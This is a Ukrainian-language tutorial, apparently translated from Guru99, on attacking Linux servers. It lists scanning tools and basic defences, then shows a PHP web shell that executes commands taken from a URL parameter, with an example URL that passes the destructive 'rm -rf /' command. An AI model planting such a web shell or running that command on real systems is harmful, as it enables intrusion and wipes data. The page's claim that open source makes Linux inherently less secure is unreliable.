Злом ОС Linux: Злом с Ubuntu (Посібник із команд)

Linux є найпоширенішою серверною операційною системою, особливо для веб-серверів. Це відкритий код; це означає, що будь-хто може мати доступ до вихідного коду. Це робить її менш безпечною порівняно з іншими операційними системами, оскільки зловмисники можуть вивчати вихідний код, щоб знайти вразливі місця. Linux for Hackers — це використання цих вразливостей для отримання неавторизованого доступу до системи.

У цій статті ми познайомимо вас з тим, що таке Linux, його вразливості безпеки, злом Ubuntu і контрзаходи, які ви можете вжити.

Коротка примітка про Linux

Linux — операційна система з відкритим вихідним кодом. Існує багато дистрибутивів операційних систем на базі Linux, таких як Redhat, Fedora та Ubuntu, тощо. На відміну від інших операційних систем, Linux є менш безпечною, коли йдеться про безпеку. Це пов’язано з тим, що вихідний код доступний у вільному доступі, тому його легко вивчити на вразливості та використати їх у порівнянні з іншими операційними системами, які не є відкритими. Linux можна використовувати як серверну, настільну, планшетну або мобільну операційну систему.

Програмами Linux можна керувати за допомогою GUI або команд. Команди Linux для Kali Linux хакінг є ефективнішим і ефективнішим порівняно з використанням графічного інтерфейсу користувача. З цієї причини корисно знати основні команди Linux для злому.

Зверніться до цих посібників https://www.guru99.com/unix-linux-tutorial.html про те, як почати Kali Linux хакі.

Інструменти злому Linux

  • Нессус– цей інструмент можна використовувати для Ubuntu зламати, сканувати параметри конфігурації, виправлення та мережі тощо, його можна знайти за адресою https://www.tenable.com/products/nessus
  • NMap. Цей інструмент можна використовувати для моніторингу хостів, які працюють на сервері, і служб, які вони використовують. Його також можна використовувати для сканування портів. Його можна знайти на https://nmap.org/
  • САРА – SARA - це абревіатура від Security Auditor's Research Assistant. Як випливає з назви, цей інструмент можна використовувати для перевірки мереж на наявність таких загроз, як SQL-ін'єкція, XSS тощо, його можна знайти за адресою http://www-arc.com/sara/sara.html

Наведений вище перелік не є вичерпним; це дає вам уявлення про інструменти, доступні для Ubuntu злом і злом систем Linux.

Як запобігти злому Linux

Linux Hacking використовує вразливі місця в операційній системі. Організація може прийняти наведену нижче політику, щоб захистити себе від таких атак.

  • Управління патчем– патчі виправляють помилки, які зловмисники використовують для компрометації системи. Хороша політика керування виправленнями забезпечить постійне застосування відповідних виправлень до вашої системи.
  • Правильна конфігурація ОС– інші експлойти використовують недоліки в конфігурації сервера. Неактивні імена користувачів і демони повинні бути вимкнені. Налаштування за замовчуванням, такі як загальні паролі до програми, імена користувачів за замовчуванням і деякі номери портів, слід змінити.
  • Система виявлення вторгнень– такі засоби можна використовувати для виявлення несанкціонованого доступу до системи. Деякі інструменти мають здатність виявляти та запобігати таким атакам.

Хакерська діяльність: зламати a Ubuntu Система Linux з використанням PHP

У цьому практичному сценарії ми навчимося зламати за допомогою Ubuntu і ми надамо вам основну інформацію про те, як ви можете використовувати PHP скомпрометувати Linux. Ми не збираємося націлюватися на жодну жертву. Якщо ви хочете спробувати, ви можете встановити LAMPP на вашій локальній машині.

PHP містить дві функції, які можна використовувати для виконання команд злому Linux. Він має функції exec() і shell_exec(). Функція exec() повертає останній рядок виводу команди, тоді як shell_exec() повертає весь результат команди у вигляді рядка.

Для демонстрації припустімо, що менеджери зловмисників завантажують наступний файл на веб-сервер.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

ТУТ,

Наведений вище сценарій отримує команду зі змінної GET під назвою cmd. Команда виконується за допомогою shell_exec(), а результати повертаються в браузер.

Наведений вище код можна використати за такою URL-адресою

http://localhost/cp/konsole.php?cmd=ls%20-l

ТУТ,

  • “…konsole.php?cmd=ls%20-l”присвоює значення ls –l змінній cmd.

Команда в Ubuntu за злом сервера буде виконано як

shell_exec('ls -l') ;

Виконання наведеного вище коду на веб-сервері дає результати, подібні до наведених нижче.

Хак а Ubuntu Система Linux з використанням PHP

Наведена вище команда просто відображає файли в поточному каталозі та дозволи

Припустімо, зловмисник передає таку команду

rm -rf /

ТУТ,

  • «rm» видаляє файли
  • “rf” змушує команду rm виконуватися в рекурсивному режимі. Видалення всіх папок і файлів
  • “/” вказує команді почати видалення файлів із кореневого каталогу

URL-адреса атаки виглядатиме приблизно так

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Підсумки

  • Linux — популярна операційна система для серверів, настільних ПК, планшетів і мобільних пристроїв.
  • Linux є відкритим кодом, і вихідний код може отримати кожен. Це дозволяє легко виявити вразливі місця. Це одна з найкращих ОС для хакерів.
  • Основні та мережеві хакерські команди в Ubuntu цінні для хакерів Linux.
  • Уразливості — це слабкі місця, які можна використати для компрометації системи.
  • Хороший захист може допомогти захистити систему від злому зловмисником.